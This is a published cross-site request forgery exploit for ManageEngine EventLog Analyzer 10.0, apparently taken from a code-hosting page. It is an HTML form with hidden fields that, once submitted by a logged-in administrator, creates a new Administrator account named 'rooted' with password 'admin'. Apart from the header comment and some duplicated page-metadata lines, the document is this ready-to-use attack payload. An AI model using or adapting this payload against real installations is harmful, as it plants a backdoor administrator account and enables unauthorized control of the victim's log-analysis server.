39 lines
No EOL
1.7 KiB
HTML
39 lines
No EOL
1.7 KiB
HTML
<!--
|
|
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
|
|
Request Forgery Exploit
|
|
[+] Date: 31/03/2015
|
|
[+] Exploit Author: Akash S. Chavan
|
|
[+] Vendor Homepage: https://www.manageengine.com/
|
|
[+] Software Link:
|
|
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
|
|
[+] Version: Version: 10.0, Build Number: 10001
|
|
[+] Tested on: Windows 8.1/PostgreSQL
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
|
|
<input type="hidden" name="domainId" value="" />
|
|
<input type="hidden" name="roleId" value="" />
|
|
<input type="hidden" name="addField" value="true" />
|
|
<input type="hidden" name="userType" value="Administrator" />
|
|
<input type="hidden" name="userName" value="rooted" />
|
|
<input type="hidden" name="pwd1" value="admin" />
|
|
<input type="hidden" name="password" value="admin" />
|
|
<input type="hidden" name="userGroup" value="Administrator" />
|
|
<input type="hidden" name="email" value="" />
|
|
<input type="hidden" name="AddSubmit" value="Add User" />
|
|
<input type="hidden" name="alpha" value="" />
|
|
<input type="hidden" name="userIds" value="" />
|
|
<input type="hidden" name="roleName" value="" />
|
|
<input type="hidden" name="selDevices" value="" />
|
|
<input type="hidden" name="doAction" value="" />
|
|
<input type="hidden" name="productName" value="eventlog" />
|
|
<input type="hidden" name="licType" value="Prem" />
|
|
<input type="hidden" name="next" value="" />
|
|
<input type="hidden" name="currentUserId" value="1" />
|
|
<input type="hidden" name="isAdminServer" value="false" />
|
|
<input type="submit" value="Click Me" />
|
|
</form>
|
|
</body>
|
|
</html> |